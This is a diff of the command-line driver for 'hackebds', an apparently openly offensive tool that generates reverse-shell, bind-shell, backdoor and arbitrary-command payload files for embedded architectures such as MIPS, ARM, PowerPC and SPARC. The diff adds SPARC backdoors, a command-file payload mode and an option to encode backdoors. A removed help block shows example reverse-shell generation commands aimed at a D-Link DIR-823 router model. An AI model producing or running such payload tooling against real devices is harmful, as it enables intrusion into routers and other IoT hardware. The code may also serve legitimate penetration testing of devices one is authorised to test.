-	18: sparc32.sparc_backdoor
+	18: sparc32.sparc_backdoor,
+	19: None,
+	20: sparc64.sparc64_backdoor
 }
 
 reverse_shellcode_dic = {
@@ -3363,6 +3478,26 @@ reverse_shellcode_dic = {
 	17: powerpc_info.ppc64le_reverse_sl
 }
 
+hackebds_cmd_dic = {
+	1: hackebds_cmd.mips_shell_cmd,
+	2: hackebds_cmd.mipsel_shell_cmd,
+	3: hackebds_cmd.mips64_cmd_file,
+	4: hackebds_cmd.mips64el_cmd_file,
+	5: hackebds_cmd.armelv5_shell_cmd,
+	6: hackebds_cmd.armelv7_shell_cmd,
+	7: hackebds_cmd.armebv5_shell_cmd,
+	8: hackebds_cmd.armebv7_cmd_file,
+	9: None,
+	10: None,
+	11: None,
+	12: None,
+	13: None,
+	14: None,
+	15: None,
+	16: None,
+	17: None,
+	18: None
+}
 
 bind_shell_dic = {
 	1: mips_bind_shell,
@@ -3376,10 +3511,18 @@ bind_shell_dic = {
 	9: aarch64_bind_shell,
 	10: x86_bind_shell,
 	11: x64_bind_shell,
-	12: None
+	12: None,
+	13: None,
+	14: powerpc_info.powerpc_bind_shell,
+	15: None,
+	16: None,
+	17: None,
+	18: sparc32.sparc_bind_shell
 }
 
 
+
+
 arch_2_num_dic ={
 	'mips': 1,
 	'mipsel': 2,
@@ -3399,7 +3542,8 @@ arch_2_num_dic ={
 	'powerpc64':16,
 	'powerpc64le': 17,
 	'sparc': 18,
-	'sparcel': 19
+	'sparcel': 19,
+	'sparc64':20
 
 }
 
@@ -3424,30 +3568,24 @@ def num_getbind_shell(number, listen_port, passwd, filename):
 	fun = bind_shell_dic.get(number)
 	return fun(listen_port, passwd, filename)
 
+def num_get_file_cmd(number, CMD_PATH,CMD, filename):
+	fun = hackebds_cmd_dic.get(number)
+	return fun(CMD, CMD_PATH ,filename)
+
+
 def main():
-	example = '''
-example
-	Generate reverse_shell_file Corresponding architecture:
-	Once:   hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -arch mips -model DIR-823 -res reverse_shell_file 
-	Second: hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -model DIR-823 -res reverse_shell_file 
-	Generate reverse_shellcode Corresponding architecture:
-	Once:   hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -arch mips -model DIR-823 -res reverse_shellcode
-	Second: hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -model DIR-823 -res reverse_shellcode
-	Generate bind_shell Corresponding architecture:
-	Once:   hackebds -bind_port 8080 -passwd 1234 -arch mips -model DIR-823 -res bind_shell
-	Second: hackebds -bind_port 8080 -passwd 1234  -model DIR-823 -res bind_shell
-	model for CVE info(Online or localfile):
-	hackebds -model DIR-823 -res cveinfo
-	'''
-	parser = argparse.ArgumentParser(example)
+	parser = argparse.ArgumentParser()
 	parser.add_argument('-reverse_ip', required=False, type=str, default=None, help='reverse_ip set')
 	parser.add_argument('-reverse_port', required=False, type=int, default=None ,help='reverse_port set')
-	parser.add_argument('-arch', required=False, type=str, help='Target arch architecturet', choices=('mips','mipsel','mips64','mipsel64','armelv5','armelv7','armebv5','armebv7','aarch64','x86','x64','aarch64','android','powerpc','powerpcle','powerpc64','powerpc64le','sparc'))
-	parser.add_argument('-res', required=False,type=str,default=None, choices=('reverse_shell_file', 'reverse_shellcode', 'bind_shell','cveinfo'))
+	parser.add_argument('-arch', required=False, type=str, help='Target arch architecturet', choices=('mips','mipsel','mips64','mipsel64','armelv5','armelv7','armebv5','armebv7','aarch64','x86','x64','android','powerpc','powerpcle','powerpc64','powerpc64le','sparc','sparc64'))
+	parser.add_argument('-res', required=False,type=str,default=None, choices=('reverse_shell_file', 'reverse_shellcode', 'bind_shell','cmd_file','cveinfo'))
 	parser.add_argument('-passwd', required=False, type=str,default="1234")
 	parser.add_argument('-model', required=False, type=str,default=None, help='device model,learn module')
 	parser.add_argument('-bind_port', required=False, type=int,default=None, help='bind_shell port')
 	parser.add_argument('-filename', required=False, type=str,default=None, help='Generate file name')
+	parser.add_argument('-cmd_path', required=False, type=str,default=None, help='Commands Path')
+	parser.add_argument('-cmd', required=False, type=str,default=None, help='Commands executed')
+	parser.add_argument('-encode', '--encode' ,action='store_true', help='encode backdoor')
 	parser.add_argument('-v', '--version' ,action='version', version=get_version(), help='Display version')
 	#parser.add_argument("-v","--version", help="version",action="store_true")
 	#parser.add_argument('-cveinfo', action='store_true',required=False, help='Generate file name')
@@ -3471,7 +3609,9 @@ example
 			args.model = None
 			log.info("Unable to create model architecture relationship due to permission or other problems")
 			pass
+
 	log.success("Data file detection")
+
 	if(args.arch != None and args.model != None):
 		flag_cve_info = 1
 		try:
@@ -3481,13 +3621,14 @@ example
 		except Exception as e:
 			model = args.model
 			args.model = None
-			log.info("There is no cross reference relationship locally, adding the corresponding relationship")
+			log.info("There is no cross reference relationship locally, adding the corresponding relationship, can be edited manually /tmp/hackebds_model_table")
 			#print(e)
 			if (args.arch ==None):
 				log.info("arch not set")
 				return
+			log.success("Establishing relationship")
 			log.info("Please make sure arch is set correctly, If necessary, you can modify /tmp/hackebds_model_table")
-			log.success("{} ---> {}, After that, you only need to specify {}, not the arch".format(model ,args.arch, args.model))
+			log.success("{} ---> {}, After that, you only need to specify {}, not the arch".format(model ,args.arch, model))
 			model_choise.append_to_tree(model, args.arch)
 
 	if (args.model != None and args.arch==None):
@@ -3495,45 +3636,67 @@ example
 			flag_cve_info  = 1
 			args.arch = model_choise.model_to_arch(args.model)
 		except:
-			log.info("There is no cross reference relationship locally, please set -arch building relationships")
+			log.info("There is no cross reference relationship locally, please set -arch building relationships, can be edited manually /tmp/hackebds_model_table")
 
 	if(args.model == None and args.arch==None):
 		log.error("please set arch or model")
 
-	if (args.res == "reverse_shell_file" and args.arch != None):
+	if (args.res == "reverse_shell_file" and args.arch != None and args.encode == False ):
 		if (args.reverse_ip!=None or args.reverse_port != None):
+      
 			try:
 				num_getreverse_file(arch_get_number(args.arch), args.reverse_ip, args.reverse_port, args.filename)
+				return
+
 			except Exception as e:
 				print(e)
 				log.info("please check your IP format and PORT ,If it is correct then The function is still under development. Please wait")
 		else:
-			log.error("please set reverse_ip or reverse_port")
+			log.info("please set reverse_ip or reverse_port")
 			return 
 
-	if (args.res == "reverse_shellcode" and args.arch != None):
+	if (args.res == "reverse_shellcode" and args.arch != None and args.encode == False ):
 		if (args.reverse_ip!=None or args.reverse_port != None):
 			try:
 				num_getreverse_shellcode(arch_get_number(args.arch), args.reverse_ip, args.reverse_port)
+				return 
+				
 			except Exception as e:
 				print(e)
 				log.info("please check your IP format and PORT ,If it is correct then function is still under development. Please wait")
 		else:
 			log.error("please set reverse_ip or reverse_port")
 			return 
+
 	if (args.res == "bind_shell"):
 		try:
-			if (args.passwd==None or args.bind_port == None and args.arch!=None ):
-				log.error("please set bind passwd or bind_port")
-				return
+			if (args.passwd==None or args.bind_port == None and args.arch!=None and args.encode == False ):
+				log.info("please set bind passwd or bind_port")
+				return 
+
 			num_getbind_shell(arch_get_number(args.arch), args.bind_port, args.passwd, args.filename)
+			return 
 		except Exception as e:
 			log.info("please check your IP format and PORT ,If it is correct then function is still under development. Please wait")
-			#print(e)
+			print(e)
 			#pass
+		
 	if (flag_cve_info == 1 and args.res=="cveinfo" ):
 		cve_info.main(args.model)
+		return 
 
+	if (args.res == "cmd_file" and args.arch != None and args.encode == False ):
+		if(args.cmd != None):
+			try:
+				num_get_file_cmd(arch_get_number(args.arch), args.cmd_path, args.cmd,args.filename)
+				return 
+			except Exception as e:
+				print(e)
+				pass
+		else:
+			log.info("please set command")
+	else:
+		log.info("function is still under development. Please wait")
 
 if __name__ == "__main__":
 	main()
